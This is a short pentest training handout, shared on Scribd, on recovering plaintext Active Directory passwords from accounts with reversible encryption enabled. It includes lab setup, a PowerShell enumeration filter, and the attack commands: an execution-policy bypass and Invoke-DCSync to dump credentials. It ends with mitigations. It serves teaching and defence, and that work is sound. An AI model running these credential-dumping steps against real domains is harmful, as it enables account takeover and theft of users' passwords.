Scribd
Upload
28 views8 pages

Active Directory Pentest Course-1

Uploaded by

Emr2356 Emr2356gmail.com
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
28 views8 pages

Active Directory Pentest Course-1

Uploaded by

Emr2356 Emr2356gmail.com
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 8

Page 1 of 7

Contents
Credential Dumping – Active Directory Plain Text Password ...............3
Introduction.......................................................................................3
Do you know? ....................................................................................3
Lab Setup ...........................................................................................3
Enabling Reversible encryption in Active Directory Users................................. 3
Enumeration ......................................................................................5
Attack: DC-Sync..................................................................................5
Mitigation ..........................................................................................7
Conclusion .........................................................................................7

Page 2 of 7
Credential Dumping – Active Directory Plain Text Password

Introduction
According to MITRE an adversary may abuse Active Directory authentication encryption
properties to gain access to credentials on Windows systems. The
AllowReversiblePasswordEncryption property specifies whether reversible password
encryption for an account is enabled or disabled. By default this property is disabled (instead
storing user credentials as the output of one-way hashing functions) and should not be enabled
unless legacy or other software require it.

• MITRE TACTIC: Credential Dumping (ID: TA0006)


• MITRE Technique Modify Authentication Process (T1556)
• MITRE SUB ID: Reversible Encryption (T1556.005)

In Domain Controller user account reversible encryption is enabled, which means the encrypted
data can be reversed back to the user’s password. The password stored with reversible
encryption policy is not a hash since a function can be called to get back to the original clear-text
password.

Do you know?
As per Microsoft: If you use the Challenge Handshake Authentication Protocol (CHAP) through
remote access or Internet Authentication Services (IAS), you must enable this policy setting.
CHAP is an authentication protocol that is used by remote access and network connections.
Digest Authentication in Internet Information Services (IIS) also requires that you enable this
policy setting.

Lab Setup

Enabling Reversible encryption in Active Directory Users


There is multiple methods to enable Reversible encryption property:

1) User Account Property

Enable the Reversible encryption by modify the account property for Domain User account.

Page 3 of 7
2) Powershell Command

set-ADUser – AllowReversiblePasswordEncryption $true

3) Group policy Management-


Enable the store password using reversible encryption with Computer Configuration\Windows
Settings\Security Settings\Account Policies\Password Policy\

Page 4 of 7
Validate the property through User’s property-Attribute Editor for UserAccountControl.

NOTE: Now if the system Administrator reset the password for the user account, an adversary may be
able to obtain the plaintext of passwords created/changed after the property was enabled.

Enumeration
PowerShell Command to find user enabled with allow reversible password encryption.

Get-ADUser -Filter {AllowReversiblePasswordEncryption -eq "true"} | Select Name, sAMAccountName

Attack: DC-Sync
In our Pervious article we have describe about DCsyn attack, read more from here. You can download the
DC Sync Script tool here.

Commands to execute in the domain controller to check user clear text password.

Page 5 of 7
1. powershell.exe -ep bypass
2. Import-Module .\Invoke-DCSync.ps1
3. Invoke-DCSync -AllData

DCSync shows the clear-text password of target user.

Page 6 of 7
Mitigation
• Ensure that Allow Reversible Password Encryption property is set to disabled.

• Group policy store password using reversible encryption is set to disable.

Conclusion
In this article, we were able to decrypt the password of active directory user accounts. This article
can serve as a reference for Red Team activists for Credential Dumping – Active Directory Plain
Text Password.

Page 7 of 7
JOIN OUR
TRAINING PROGRAMS
H ERE
CLICK BEGINNER

Bug Bounty Network Security


Ethical Hacking Essentials

Network Pentest
Wireless Pentest

ADVANCED

Burp Suite Pro Web Pro Computer


Services-API Infrastructure VAPT Forensics

Advanced CTF
Android Pentest Metasploit

EXPERT

Red Team Operation

Privilege Escalation
APT’s - MITRE Attack Tactics
Windows
Active Directory Attack
Linux
MSSQL Security Assessment

www.ignitetechnologies.in

You might also like